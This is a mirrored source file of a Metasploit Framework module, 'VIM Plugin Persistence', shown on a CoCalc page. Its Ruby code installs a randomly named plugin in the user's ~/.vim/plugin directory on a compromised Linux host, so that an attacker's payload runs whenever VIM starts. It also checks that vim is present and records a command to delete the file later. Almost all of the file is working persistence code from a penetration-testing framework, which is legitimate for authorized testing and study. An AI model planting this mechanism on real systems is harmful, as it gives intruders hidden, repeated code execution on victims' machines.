Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/vim_plugin.rb
70334 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::Local::Persistence

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'VIM Plugin Persistence',

18
        'Description' => %q{

19
          This module creates a VIM Plugin which executes a payload on VIM startup.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'h00die',

24
        ],

25
        'Platform' => [ 'linux' ],

26
        'Arch' => [ ARCH_CMD ],

27
        'SessionTypes' => [ 'meterpreter', 'shell' ],

28
        'Targets' => [[ 'Auto', {} ]],

29
        'References' => [

30
          [ 'URL', 'https://vimways.org/2019/writing-vim-plugin/'],

31
          [ 'URL', 'https://www.linode.com/docs/guides/writing-a-vim-plugin/'],

32
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

33
        ],

34
        'DisclosureDate' => '1991-11-03', # VIM release date

35
        'DefaultTarget' => 0,

36
        'Notes' => {

37
          'Stability' => [CRASH_SAFE],

38
          'Reliability' => [REPEATABLE_SESSION],

39
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

40
        }

41
      )

42
    )

43
    register_advanced_options [

44
      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random'])

45
    ]

46
  end

47


48
  def check

49
    return CheckCode::Safe('VIM is required') unless command_exists?('vim')

50


51
    CheckCode::Detected('VIM is installed')

52
  end

53


54
  def plugin_name

55
    return datastore['NAME'] unless datastore['NAME'].blank?

56


57
    Rex::Text.rand_text_alpha(5..10)

58
  end

59


60
  def get_home

61
    return cmd_exec('echo ~').strip

62
  end

63


64
  def install_persistence

65
    plugin = plugin_name

66
    vim_plugin = File.read(File.join(

67
      Msf::Config.data_directory, 'exploits', 'vim_plugin', 'plugin.vim'

68
    ))

69
    vim_plugin = vim_plugin.gsub('PAYLOAD_PLACEHOLDER', payload.encoded.gsub(';./', ';nohup ./')) # already run async

70
    vim_plugin = vim_plugin.gsub('NAME', plugin)

71


72
    path = "#{get_home}/.vim/plugin"

73
    mkdir(path, cleanup: false) unless directory?(path)

74
    path = "#{path}/#{plugin}.vim"

75
    vprint_status("Writing plugin to #{path}")

76
    unless write_file(path, vim_plugin)

77
      fail_with(Failure::UnexpectedReply, "Failed to write VIM plugin to #{path}")

78
    end

79
    @clean_up_rc = "rm #{path}\n"

80
  end

81
end

82


83